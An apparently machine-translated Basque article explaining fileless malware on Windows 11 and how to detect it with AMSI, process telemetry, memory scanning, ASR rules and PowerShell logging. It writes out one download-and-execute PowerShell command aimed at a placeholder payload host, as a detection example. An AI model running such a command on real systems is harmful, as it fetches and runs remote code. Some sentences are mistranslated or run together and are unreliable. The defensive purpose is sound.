Nola detektatu fitxategirik gabeko malware arriskutsua Windows 11n

¿Nola detektatu fitxategirik gabeko malware arriskutsua? Fitxategirik gabeko erasoen jarduera nabarmen hazi da, eta are okerrago, Windows 11 ez da immuneaIkuspegi honek diskoa saihesten du eta memorian eta sistemaren tresna legitimoetan oinarritzen da; horregatik zailtasunak dituzte sinaduran oinarritutako antibirus programek. Detektatzeko modu fidagarri baten bila bazabiltza, erantzuna konbinatzean datza telemetria, portaeraren analisia eta Windows kontrolak.

Gaur egungo ekosisteman, PowerShell, WMI edo Mshta abusatzen duten kanpainak memoria injekzioak, diskoa "ukitu gabe" iraunkortasuna eta baita teknika sofistikatuagoekin ere batera bizi dira. firmwarearen gehiegikeriakGakoa mehatxu-mapa, eraso-faseak eta zer seinale uzten dituzten ulertzea da, dena RAMaren barruan gertatzen denean ere.

Zer da fitxategirik gabeko malwarea eta zergatik da kezkagarria Windows 11n?

"Fitxategirik gabeko" mehatxuei buruz hitz egiten dugunean, kode gaiztoari buruz ari gara. Ez duzu exekutagarri berriak gordailatu beharrik fitxategi-sisteman funtziona dezan. Normalean martxan dauden prozesuetan txertatzen da eta RAM memorian exekutatzen da, Microsoft-ek sinatutako interprete eta binarioetan oinarrituta (adibidez, PowerShell, WMI, rundll32, mshtaHorrek zure aztarna murrizten du eta fitxategi susmagarriak soilik bilatzen dituzten motorrak saihesteko aukera ematen dizu.

Abiarazteko komandoen ahultasunak ustiatzen dituzten bulegoko dokumentuak edo PDFak ere fenomenoaren parte dira, zeren eta memorian exekuzioa aktibatu analisietarako binario erabilgarriak utzi gabe. Gehiegikeria makroak eta DDE Office-n, kodea WinWord bezalako prozesu legitimoetan exekutatzen baita.

Erasotzaileek ingeniaritza soziala (phishing-a, spam estekak) tranpa teknikoekin konbinatzen dute: erabiltzailearen klikak kate bat abiarazten du, non script batek azken karga memorian deskargatu eta exekutatzen duen. arrastorik uztea saihestuz diskoan. Helburuak datuen lapurretatik hasi eta ransomware exekuzioraino doaz, alboko mugimendu isilak barne.

Tipologiak sisteman duen aztarnaren arabera: 'puruetatik' hibridoetaraino

Kontzeptu nahasgarriak saihesteko, lagungarria da mehatxuak fitxategi-sistemarekin duten interakzio-mailaren arabera bereiztea. Sailkapen honek argitzen du Zer irauten du, non bizi da kodea eta zer zantzu uzten ditu?.

I. mota: fitxategi-jarduerarik ez

Fitxategirik gabeko malwareak ez du ezer idazten diskoan. Adibide klasiko bat ustiatzea da sarearen ahultasuna (garai bateko EternalBlue bektoreak bezala) kernelaren memorian kokatutako atzeko ate bat ezartzeko (DoublePulsar bezalako kasuak). Hemen, dena RAM memorian gertatzen da eta ez dago artefakturik fitxategi sisteman.

Beste aukera bat kutsatzea da firmwarea osagaien artean: BIOS/UEFI, sareko egokigailuak, USB periferikoak (BadUSB motako teknikak) edo baita CPU azpisistemak ere. Berrabiarazi eta berriro instalatu ondoren ere irauten dute, zailtasun gehigarriarekin Produktu gutxik firmwarea ikuskatzen duteEraso konplexuak dira, maiztasun gutxiagokoak, baina arriskutsuak dira haien isilpekotasunagatik eta iraunkortasunagatik.

II. mota: Zeharkako artxibatze jarduera

Hemen, malwareak ez du bere exekutagarria "uzten", baizik eta sistemak kudeatutako edukiontziak erabiltzen ditu, funtsean fitxategi gisa gordeta daudenak. Adibidez, atzeko ateak... PowerShell komandoak WMI biltegian eta gertaera-iragazkiekin exekuzioa abiarazi. Komando-lerrotik instala daiteke binarioak galdu gabe, baina WMI biltegia diskoan dago datu-base legitimo gisa, eta horrek zaildu egiten du sisteman eraginik gabe garbitzea.

Ikuspegi praktiko batetik, fitxategirik gabekotzat hartzen dira, edukiontzi horrek (WMI, Erregistroa, etab.) Ez da detektatzeko exekutagarri klasiko bat Eta bere garbiketa ez da makala. Emaitza: iraunkortasun ezkutua, "tradizional" arrasto gutxirekin.

III. mota: Fitxategiak behar ditu funtzionatzeko

Kasu batzuek mantentzen dute 'fitxategirik gabeko' iraunkortasuna Maila logikoan, fitxategietan oinarritutako abiarazle bat behar dute. Adibide tipikoa Kovter da: ausazko luzapen baterako shell aditz bat erregistratzen du; luzapen hori duen fitxategi bat irekitzen denean, mshta.exe erabiltzen duen script txiki bat abiarazten da, Erregistroko kate gaiztoa berreraikitzen duena.

Trikimailua da ausazko luzapenak dituzten "amu" fitxategi hauek ez dutela azter daitekeen kargarik, eta kodearen zatirik handiena bertan dagoela. Erregistroa (beste edukiontzi bat). Horregatik sailkatzen dira eraginpean fitxategirik gabekotzat, nahiz eta, zehatz-mehatz esanda, disko-artefaktu bat edo gehiagoren mende egon abiarazle gisa.

Infekzioaren bektoreak eta 'ostalariak': non sartzen den eta non ezkutatzen den

Detekzioa hobetzeko, ezinbestekoa da infekzioaren sarrera puntua eta ostalaria mapatzea. Ikuspegi honek diseinatzen laguntzen du kontrol zehatzak Telemetria egokia lehenetsi.

Ustiapenak

• Fitxategietan oinarritutako (III. mota): Dokumentuek, exekutagarriek, Flash/Java fitxategi zaharrek edo LNK fitxategiek arakatzailea edo prozesatzen dituen motorra erabil dezakete shellcode memorian kargatzeko. Lehenengo bektorea fitxategi bat da, baina karga RAM memoriara doa.
• Sarean oinarritutako (I. mota): Ahultasun bat ustiatzen duen pakete batek (adibidez, SMB-n) erabiltzaile-eremuan edo nukleoan exekutatzen da. WannaCry-k zabaldu zuen ikuspegi hau. Memoriaren karga zuzena fitxategi berririk gabe.

Hardwarea

• Gailuak (I. mota): Diskoaren edo sare-txartelaren firmwarea alda daiteke eta kodea sartu. Zaila da ikuskatzea eta sistema eragiletik kanpo irauten du.
• CPU eta kudeaketa azpisistemak (I. mota): Intel-en ME/AMT bezalako teknologiek bideak erakutsi dituzte Sareak eta exekuzioa sistema eragiletik kanpoOso maila baxuan erasotzen du, isilpean egiteko potentzial handiarekin.
• USBa (I mota): BadUSB-k USB unitate bat berriro programatzeko aukera ematen dizu teklatu edo NIC txartel baten antzera jokatu dezan eta komandoak abiarazteko edo trafikoa birbideratzeko.
• BIOS/UEFI (I mota): Windows abiarazi aurretik exekutatzen den firmware gaiztoaren birprogramazioa (Mebromi bezalako kasuak).
• Hipervisorea (I. mota): Sistema eragilearen azpian mini-hiperbisore bat ezartzea haren presentzia ezkutatzeko. Arraroa da, baina dagoeneko ikusi da hiperbisoreen rootkiten moduan.

Exekuzioa eta injekzioa

• Fitxategietan oinarritutako (III. mota): EXE/DLL/LNK edo prozesu legitimoetan injekzioak abiarazten dituzten zeregin programatuak.
• Makroak (III. mota): Office-ko VBA-k kargak deskodetu eta exekutatu ditzake, ransomware osoa barne, erabiltzailearen baimenarekin engainuaren bidez.
• Gidoiak (II. mota): PowerShell, VBScript edo JScript fitxategitik, komando-lerrotik, zerbitzuak, Erregistroa edo WMIErasotzaileak script-a urruneko saio batean idatz dezake diskoa ukitu gabe.
• Abio erregistroa (MBR/Abioa) (II. mota): Petya bezalako familiek abio sektorea gainidazten dute abiaraztean kontrola hartzeko. Fitxategi sistematik kanpo dago, baina sistema eragilearentzat eta berreskuratu dezaketen irtenbide modernoentzat eskuragarri.

Fitxategirik gabeko erasoak nola funtzionatzen duten: faseak eta seinaleak

Kanpainek fitxategi exekutagarririk uzten ez badute ere, logika fasekatua jarraitzen dute. Haiek ulertzeak monitorizazioa ahalbidetzen du. gertaerak eta prozesuen arteko harremanak arrastoa uzten dutenak.

• Hasierako sarbideaPhishing erasoak estekak edo eranskinak, webgune konprometituak edo lapurtutako kredentzialak erabiliz. Kate asko komando bat abiarazten duen Office dokumentu batekin hasten dira. PowerShell.
• iraunkortasuna: atzeko ateak WMI bidez (iragazkiak eta harpidetzak), Erregistroaren exekuzio-giltzak edo fitxategi gaizto berririk gabe script-ak berrabiarazten dituzten zeregin programatuak.
• EsfiltrazioaInformazioa bildu ondoren, saretik kanpo bidaltzen da prozesu fidagarriak erabiliz (nabigatzaileak, PowerShell, bitsadmin) trafikoa nahasteko.

Eredu hau bereziki maltzurra da, zeren eta eraso adierazleak Normaltasunean ezkutatzen dira: komando-lerroko argumentuak, prozesuen kateatzeak, irteerako konexio anomaloak edo injekzio APIetarako sarbidea.

Teknika ohikoenak: memoriatik grabaziora

Aktoreek hainbat aukeratan oinarritzen dira metodoak isilpean egotea optimizatzen dutenak. Detekzio eraginkorra aktibatzeko ohikoenak ezagutzea lagungarria da.

• Oroimenean bizi denKarga erabilgarriak aktibazio zain dagoen prozesu fidagarri baten espazioan kargatzen. rootkitak eta kakoak Kernelean, ezkutatze maila igotzen dute.
• Erregistroan iraunkortasuna.Gorde zifratutako blob-ak gakoetan eta berrhidratatu itzazu abiarazle legitimo batetik (mshta, rundll32, wscript). Instalatzaile efimeroak bere burua suntsitu dezake bere aztarna minimizatzeko.
• Kredentzialen phishing-aErabiltzaile-izen eta pasahitz lapurtuak erabiliz, erasotzaileak urruneko shell-ak eta instalazioak exekutatzen ditu. sarbide isila Erregistroan edo WMI-n.
• 'Fitxategirik gabeko' RansomwareaEnkriptazioa eta C2 komunikazioa RAM memoriatik orkestratzen dira, kaltea ikusgai egon arte detektatzeko aukerak murriztuz.
• Funtzionamendu-kitak: erabiltzaileak klik egin ondoren ahultasunak detektatzen dituzten eta memoria soilik duten kargak zabaltzen dituzten kate automatizatuak.
• Kodea duten dokumentuak: exekutagarriak diskoan gorde gabe komandoak abiarazten dituzten makroak eta DDE bezalako mekanismoak.

Industria-ikerketek dagoeneko gailur nabarmenak erakutsi dituzte: 2018ko aldi batean, %90etik gorako igoera script-ean oinarritutako eta PowerShell kate-erasoetan, bektore hori bere eraginkortasunagatik nahiago den seinale.

Enpresentzako eta hornitzaileentzako erronka: zergatik ez den nahikoa blokeatzea

Tentagarria litzateke PowerShell desgaitzea edo makroak betiko debekatzea, baina Operazioa hautsiko zenuke.PowerShell administrazio modernoaren zutabe bat da eta Office ezinbestekoa da negozioetan; itsu-itsuan blokeatzea askotan ez da bideragarria.

Gainera, oinarrizko kontrolak saihesteko moduak daude: PowerShell DLL eta rundll32 bidez exekutatzea, scriptak EXE fitxategietan sartzea, Ekarri zure PowerShell-en kopia propioa edo baita irudietan gidoiak ezkutatu eta memoriara atera ere. Beraz, defentsa ezin da tresnen existentzia ukatzean soilik oinarritu.

Beste ohiko akats bat erabaki osoa hodeiari eskuordetzea da: agenteak zerbitzariaren erantzun baten zain egon behar badu, Denbora errealeko prebentzioa galtzen duzuTelemetria datuak igo daitezke informazioa aberasteko, baina Arintzea amaieran gertatu behar da.

Nola detektatu fitxategirik gabeko malwarea Windows 11n: telemetria eta portaera

Irabazteko estrategia da prozesuak eta memoria monitorizatuEz fitxategiak. Jokabide gaiztoak fitxategi batek hartzen dituen formak baino egonkorragoak dira, eta horrek aproposak bihurtzen ditu prebentzio-motorrentzat.

• AMSI (Antimalware Eskaneatze Interfazea)PowerShell, VBScript edo JScript script-ak atzematen ditu, memorian dinamikoki eraikita daudenean ere. Bikaina da exekutatu aurretik nahasitako kateak harrapatzeko.
• Prozesuen monitorizazioahasiera/helmuga, PID, gurasoak eta seme-alabak, ibilbideak, komando lerroak eta hash-ak, gehi exekuzio-zuhaitzak istorio osoa ulertzeko.
• Memoriaren analisia: injekzioen, karga islatzaileen edo PEen detekzioa diskoa ukitu gabe, eta eskualde exekutagarri ezohikoen berrikuspena.
• Hasierako sektorearen babesa: MBR/EFIren kontrola eta leheneratzea manipulazio kasuan.

Microsoft-en ekosisteman, Defender for Endpoint-ek AMSI konbinatzen du, portaeraren jarraipenaMemoriaren eskaneatzea eta hodeian oinarritutako ikaskuntza automatikoa erabiltzen dira detekzioak aldaera berri edo nahasien arabera eskalatzeko. Beste saltzaile batzuek antzeko ikuspegiak erabiltzen dituzte kernelean egoiliar diren motorrekin.

Korrelazioaren adibide errealista: dokumentutik PowerShell-era

Imajinatu Outlook-ek eranskin bat deskargatzen duen, Word-ek dokumentua irekitzen duen, eduki aktiboa gaituta dagoen eta PowerShell parametro susmagarriekin abiarazten den kate bat. Telemetria egokiak erakutsiko luke... komando-lerroa (adibidez, ExecutionPolicy Bypass, leiho ezkutua), domeinu ez-fidagarri batera konektatzea eta AppData-n bere burua instalatzen duen haur-prozesu bat sortzea.

Testuinguru lokala duen agente batek gai da gelditu eta atzera egin eskuzko esku-hartzerik gabeko jarduera gaiztoa, SIEM-ari edo posta elektronikoz/SMS bidez jakinarazteaz gain. Produktu batzuek erroko kausa atribuzio geruza bat gehitzen dute (StoryLine motako ereduak), eta horrek ez du ikusgai dagoen prozesura (Outlook/Word) seinalatzen, baizik eta hari gaizto osoa eta bere jatorria sistema erabat garbitzeko.

Kontuan izan beharreko komando-eredu tipiko bat honelakoa izan liteke: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logika ez da kate zehatza, baina seinale multzoa.: politika saihesbidea, leiho ezkutua, deskarga garbitu eta memorian exekuzioa.

AMSI, hoditeria eta aktore bakoitzaren eginkizuna: amaierako puntutik SOCraino

Gidoiak harrapatzeaz haratago, arkitektura sendo batek ikerketa eta erantzuna errazten dituzten urratsak orkestratzen ditu. Zenbat eta ebidentzia gehiago karga exekutatu aurretik, orduan eta hobeto., hobeto.

• Script-aren atzemateaAMSI-k edukia (berehala sortua bada ere) malware-hodi batean analisi estatiko eta dinamikoetarako banatzen du.
• Prozesu gertaerakPIDak, bitarrak, hashak, ibilbideak eta bestelako datuak biltzen dira. argudioak, azken kargara eraman zuten prozesu-zuhaitzak ezarriz.
• Detekzioa eta txostenakDetekzioak produktuaren kontsolan bistaratzen dira eta sareko plataformetara (NDR) birbidaltzen dira kanpaina bistaratzeko.
• Erabiltzaileen bermeakScript bat memorian injektatzen bada ere, esparrua AMSIk atzematen du Windows-en bertsio bateragarrietan.
• Administratzaile gaitasunak: gidoien ikuskapena gaitzeko politika konfigurazioa, portaeran oinarritutako blokeoa eta txostenak kontsolatik sortzea.
• Gizarte Zerbitzuen lana: artefaktuen erauzketa (VM UUID, sistema eragilearen bertsioa, script mota, abiarazle prozesua eta bere gurasoa, hash-ak eta komando lerroak) historia eta birsortzeko igogailuen arauak etorkizuna.

Plataformak esportatzea baimentzen duenean memoria-bufferra Exekuzioarekin lotuta, ikertzaileek detekzio berriak sor ditzakete eta antzeko aldaeren aurkako defentsa aberastu.

Windows 11-en neurri praktikoak: prebentzioa eta ehiza

Memoria ikuskapenarekin eta AMSIrekin EDR izateaz gain, Windows 11-k eraso espazioak ixteko eta ikusgarritasuna hobetzeko aukera ematen dizu. jatorrizko kontrolak.

• Erregistroa eta murrizketak PowerShell-enScript Blokeen Erregistroa eta Moduluen Erregistroa gaitzen ditu, ahal den guztietan modu mugatuak aplikatzen ditu eta erabilera kontrolatzen du Saihestu/Ezkutatuta.
• Eraso Gainazalaren Murrizketa (ASR) Arauak: Office prozesuek script-abiarazteak blokeatzen ditu eta WMIren gehiegikeria/PSExec beharrezkoa ez denean.
• Bulegoko makro politikak: lehenespenez desgaitzen ditu barneko makro sinadura eta konfiantza zerrenda zorrotzak; DDE fluxuen monitorizazioa.
• WMI Auditoria eta Erregistroa: gertaeren harpidetzak eta exekuzio automatikoko gakoak (Run, RunOnce, Winlogon) kontrolatzen ditu, baita zereginen sorrera ere programatuta.
• Abiarazteko babesa: Abiadura Segurua aktibatzen du, MBR/EFI osotasuna egiaztatzen du eta abiaraztean aldaketarik ez dagoela balioztatzen du.
• Adabakitzea eta gogortzea: arakatzaileetan, Office osagaietan eta sare zerbitzuetan ustia daitezkeen ahultasunak ixten ditu.
• kontzientzia: erabiltzaileak eta talde teknikoak phishing-ean eta seinaleen inguruan trebatzen ditu exekuzio ezkutuak.

Ehizarako, honako hauei buruzko kontsultetan zentratu: Office-k PowerShell/MSHTA-rako prozesuak sortzea, argumentuak... deskargatzekokatea/deskargatufitxategiaNahasmendu argia, injekzio islatzaileak eta TLD susmagarrietarako irteerako sareak dituzten scriptak. Seinale hauek ospearekin eta maiztasunarekin gurutzatu erreferentziak zarata murrizteko.

Zer detektatu dezake motor bakoitzak gaur egun?

Microsoften enpresa-irtenbideek AMSI, portaera-analisia konbinatzen dituzte, memoria aztertu eta abio sektorearen babesa, gehi hodeian oinarritutako ML ereduak mehatxu berrien aurka eskalatzeko. Beste saltzaile batzuek kernel mailako monitorizazioa ezartzen dute software gaiztoa eta onbera bereizteko, aldaketak automatikoki deseginz.

Oinarritutako ikuspegia. exekuzio istorioak Erroko kausa identifikatzen uzten dizu (adibidez, kate bat abiarazten duen Outlook eranskin bat) eta zuhaitz osoa arintzen: script-ak, gakoak, zereginak eta tarteko binarioak, sintoma ikusgaian trabatuta geratzea saihestuz.

Ohiko akatsak eta nola saihestu

PowerShell blokeatzea kudeaketa-plan alternatiborik gabe ez da praktikoa bakarrik, baizik eta badira... zeharka deitzeko moduakGauza bera gertatzen da makroekin: edo politika eta sinadurekin kudeatzen dituzu, edo negozioak kalte egingo du. Hobe da telemetrian eta portaera-arauetan zentratzea.

Beste akats ohiko bat zerrenda zuriko aplikazioek dena konpontzen dutela ustea da: fitxategirik gabeko teknologiak horretan oinarritzen da, hain zuzen ere. fidagarriak diren aplikazioakKontrolak zer egiten duten eta nola erlazionatzen diren ikusi beharko luke, ez bakarrik baimenduta dauden ala ez.

Goian esandako guztiarekin, fitxategirik gabeko malwarea "mamu" izateari uzten dio benetan garrantzitsua dena kontrolatzen duzunean: portaera, memoria eta jatorria exekuzio bakoitzarena. AMSI, prozesuen telemetria aberatsa, Windows 11ko kontrolak eta EDR geruza portaeraren analisiarekin konbinatzeak abantaila ematen dizu. Gehitu ekuazioari makro eta PowerShell-erako politika errealistak, WMI/Erregistroaren auditoria eta komando-lerroak eta prozesu-zuhaitzak lehenesten dituen ehiza, eta kate horiek soinurik egin aurretik mozten dituen defentsa bat duzu.